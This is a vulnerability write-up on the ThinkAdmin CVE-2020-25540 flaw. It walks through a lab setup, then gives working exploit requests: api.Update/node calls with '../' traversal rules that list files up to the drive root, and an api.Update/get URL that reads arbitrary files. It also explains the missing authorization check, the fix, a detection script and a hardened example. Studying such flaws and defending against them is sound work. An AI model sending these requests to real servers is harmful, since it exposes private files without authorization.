2025-01-18 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
How do you analyse the directory traversal and arbitrary file read vulnerability CVE-2020-25540 in ThinkAdmin? Many newcomers are unsure where to start, so this article summarises the cause of the problem and how to fix it.
Environment setup
phpstudy2018 + ThinkAdmin v6.0.3
Affected: ThinkAdmin versions ≤ 2020.08.03.01
Source of the vulnerable revision: https://github.com/zoujingli/ThinkAdmin/tree/a57c3a9373bc89f5eaa4142d047481a898b5757e
Installing Composer
1. Install the Composer command: in phpstudy set PHP to version 7.1 or higher and add the corresponding PHP folder to the PATH environment variable.
2. Open the php.ini of the phpstudy server and remove the semicolon in front of extension=php_openssl.dll. This enables the openssl extension so that Composer can use HTTPS from the command line.
3. Download the current Composer installer (https://getcomposer.org/Composer-Setup.exe) and double-click it to install; leave the checkbox unchecked.
4. Once the environment variable is configured, the PHP path is selected automatically; click through to the next step until the installation completes.
5. After the installation, type composer on the cmd command line to check that it was installed successfully.
6. Set the Aliyun Composer mirror. Access to Packagist from China is slow, so it is recommended to configure the Aliyun mirror with the following command:
composer config -g repo.packagist composer https://mirrors.aliyun.com/composer
7. Download the vulnerable version of ThinkAdmin v6 locally.
8. Change into the ThinkAdmin directory and install the dependencies:
composer install
9. Edit the configuration file config/database.php: create a database and set the account and password used to connect to it (root/root here).
Importing the database
Import the admin_v6.sql file from the ThinkAdmin package into a newly created database named admin_v6.
Common source command sequence:
Open the MySQL console, for example:
mysql -u root -p
mysql> use admin_v6;
Then run the source command followed by the script file (a .sql file here), for example:
mysql> source d:wcnc_db.sql
The import completes successfully.
10. Start the application with PHP:
php think run
Then open http://ip:8000 in the browser.
Vulnerability reproduction
Directory traversal / arbitrary file read
Directory traversal
The request can be built directly in the browser, or captured and modified with Burp.
① Use Burp to capture the request for the home page and send it to the Repeater module to construct the request that retrieves the directory listing.
② In Repeater, change GET to POST and append ?s=admin/api.Update/node to the URL.
In the request body enter rules=%5b%22%2f%22%5d (the URL-encoded form of rules=["/"]).
③ Click Send; the response contains the directory listing.
Note: in one attempt the listing came back empty (status 200 but no list content) because the captured request was not from the first load of the page, and its Content-Type header had been replaced by Cache-Control.
Capturing the request on the first load of the page works without problems.
Returned result
rules=["/"] traverses all files under E:\phpstudy2018\PHPTutorial\WWW\ThinkAdmin6:
HTTP/1.1 200 OK
Host: 192.168.80.111:8000
Date: Mon, 30 Nov 2020 10:32:39 +0800
Connection: close
X-Powered-By: PHP/7.2.1
Content-Type: application/json; charset=utf-8
Set-Cookie: think_lang=zh-cn; path=/
Set-Cookie: PHPSESSID=8a43a78b3ebd325158a78608ac57107a; path=/

{"code": 1, "info": "obtained file list successfully!", "data": {"rules": ["\/"], "ignore": [], "list": [
{"name": "\/admin_v6.sql", "hash": "a6add0e2aab0e7d45f1ef35ad7846c52"},
{"name": "\/app\/admin\/controller\/Auth.php", "hash": "9a254f39ccdb4e334d48a8596d4ced57"},
{"name": "\/app\/admin\/controller\/Config.php", "hash": "09a65b23959905b7ea511e61b75d9626"},
{"name": "\/app\/admin\/controller\/Index.php", "hash": "da3736920e43b33e18e0ba72407c8588"},
{"name": "\/app\/admin\/controller\/Login.php", "hash": "c1820e476b786a793a48ff893bf8ed3c"},
{"name": "\/app\/admin\/controller\/Menu.php", "hash": "d278f7948bfbe005987c16d18d2f49cb"},
{"name": "\/app\/admin\/controller\/Oplog.php", "hash": "7340a732685f2d4e91c01b07aa3efc4d"},
{"name": "\/app\/admin\/controller\/Queue.php", "hash": "88ca8b37cb205adbbf771878836366be"},
{"name": "\/app\/admin\/controller\/User.php", "hash": "52c893ed2f2390e6a46ca3d0fcee59da"},
{"name": "\/app\/admin\/controller\/api\/Plugs.php", "hash": "db98179054e8fe3a051f97901ea9ff2b"},
/* omit 10,000 lines */
{"name": "\/vendor\/zoujingli\/wechat-developer\/composer.json", "hash": "7db3f4ea9c17c21174c665b22992e97a"},
{"name": "\/vendor\/zoujingli\/wechat-developer\/include.php", "hash": "1434ae58cf94166d7097fe29ba0d42da"},
{"name": "\/vendor\/zoujingli\/wechat-developer\/readme.md", "hash": "5dc2765147e9aff90a838578a1dd8083"},
{"name": "\/startup instructions.txt", "hash": "263d4e9a08fbab5ac55e78cf537acb6f"}
]}}
rules=["../"] traverses all files under E:\phpstudy2018\PHPTutorial\WWW
rules=["../../"] traverses all files under E:\phpstudy2018\PHPTutorial
rules=["../../../"] traverses all files under E:\phpstudy2018
rules=["../../../../"] traverses all files under E:\
If the traversed content exceeds the size limit, an error is returned.
Arbitrary file read
① Read the file startup instructions.txt in the web root.
② Encode the file name with the application's encode function; the encoded value is used as the parameter in the next step. The function can be run on the virtual machine or online; the result is:
5i6s524v5s6j5y4q1a383c38
③ The file content can then be read by visiting the link below:
http://192.168.80.111:8000/admin.html?s=admin/api.Update/get/encode/5i6s524v5s6j5y4q1a383c38
The returned file content is base64-encoded; decode it to recover the file.
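An added detection example, not part of the original post or of the ThinkAdmin project: the script below scans constructed proxy/WAF log lines (the "method target body status" format is an assumption) and flags the two request patterns reproduced above, the api.Update/node listing with traversal rules and the api.Update/get file read.

```python
import json
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample log lines (not from the post): "<method> <target> <body|-> <status>"
SAMPLE_LOG = """\
POST /admin.html?s=admin/api.Update/node rules=%5B%22..%2F..%2F%22%5D 200
GET /admin.html?s=admin/api.Update/get/encode/5i6s524v5s6j5y4q1a383c38 - 200
GET /admin.html?s=admin/index/index - 200
POST /admin.html?s=admin/api.Update/node rules=%5B%22%2F%22%5D 200
GET /admin.html?s=admin/api.Update/node&rules=%5B%22%2F%22%5D - 200
"""

# The two methods of the Update controller that the post exercises.
UPDATE_API = re.compile(r"s=admin/api\.update/(node|get)\b", re.I)

def extract_rules(target, body):
    # 'rules' is a URL-encoded JSON list; it may arrive in the POST body or,
    # when the request is built in the browser, in the query string.
    for source in (body, urlsplit(target).query):
        raw = parse_qs(source).get("rules")
        if raw:
            try:
                rules = json.loads(raw[0])
                return rules if isinstance(rules, list) else [str(rules)]
            except ValueError:
                return [raw[0]]  # malformed input stays visible to the analyst
    return []

def classify(target, body):
    """Return a list of finding strings for one request, empty if benign."""
    m = UPDATE_API.search(target)
    if not m:
        return []
    if m.group(1).lower() == "get":
        return ["file read via api.Update/get"]
    rules = extract_rules(target, body)
    if any(".." in r for r in rules):
        return ["directory traversal in rules=" + json.dumps(rules)]
    return ["file listing of rules=" + json.dumps(rules)]

def scan(log_text):
    # Return [(line_no, findings)] for each log line that raises a finding.
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        parts = line.split()
        if len(parts) < 4:
            continue
        findings = classify(parts[1], "" if parts[2] == "-" else parts[2])
        if findings:
            hits.append((n, findings))
    return hits
```

Because the controller methods had no authorization check, every hit on these two methods from an unauthenticated source is worth reviewing, not only those with ".." in the rules.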
Cause of the vulnerability
The methods of the Update.php controller lack an authorization check, so they can be reached without an admin login.
Fix
1. Upgrade to a version later than 2020.08.03.01.
2. Or apply the official temporary fix:
https://github.com/zoujingli/ThinkAdmin/issues/244
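As an added illustration of the cause (written for this article, not the project's own fix; the official patch is at the issue link above), here is a Python stand-in for the listing method with the two checks that were missing: an administrator login check and confinement of every rule to the web root. The directory layout is constructed and the md5 digest is an assumption about how the "hash" field in the response was produced.

```python
import hashlib
import os
import tempfile

def rule_inside_root(root, rule):
    """True if root/<rule> resolves to a path inside root (no '../' escape)."""
    root = os.path.realpath(root)
    target = os.path.realpath(os.path.join(root, rule.lstrip("/\\")))
    return os.path.commonpath([root, target]) == root

def list_files(root, rules, is_admin):
    """Hardened stand-in for the Update controller's listing method.
    Unlike the behaviour reproduced in the post it refuses callers who are not
    logged-in administrators and rejects any rule that escapes the web root.
    Returns [{"name": "/relative/path", "hash": md5}] like the JSON above."""
    if not is_admin:
        raise PermissionError("admin login required")
    root = os.path.realpath(root)
    out = []
    for rule in rules:
        if not rule_inside_root(root, rule):
            raise ValueError(f"rule escapes web root: {rule!r}")
        start = os.path.realpath(os.path.join(root, rule.lstrip("/\\")))
        for dirpath, _, files in os.walk(start):
            for name in sorted(files):
                full = os.path.join(dirpath, name)
                with open(full, "rb") as fh:
                    digest = hashlib.md5(fh.read()).hexdigest()  # assumed
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                out.append({"name": "/" + rel, "hash": digest})
    return out

def demo_tree():
    """Constructed web root mirroring the post's layout, plus a file one
    level above it that a '../' rule would otherwise expose."""
    base = tempfile.mkdtemp()
    root = os.path.join(base, "ThinkAdmin6")
    os.makedirs(os.path.join(root, "app", "admin", "controller"))
    with open(os.path.join(root, "app", "admin", "controller", "Auth.php"), "w") as f:
        f.write("<?php // constructed sample\n")
    with open(os.path.join(base, "secret.txt"), "w") as f:
        f.write("outside the web root\n")
    return root

if __name__ == "__main__":
    root = demo_tree()
    print(list_files(root, ["/"], is_admin=True))
    print(rule_inside_root(root, "../"))  # False
```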
After reading the above, do you now know how to analyse the directory traversal and file read vulnerability CVE-2020-25540? If you want to learn more skills or find out more, you are welcome to follow the industry information channel. Thank you for reading!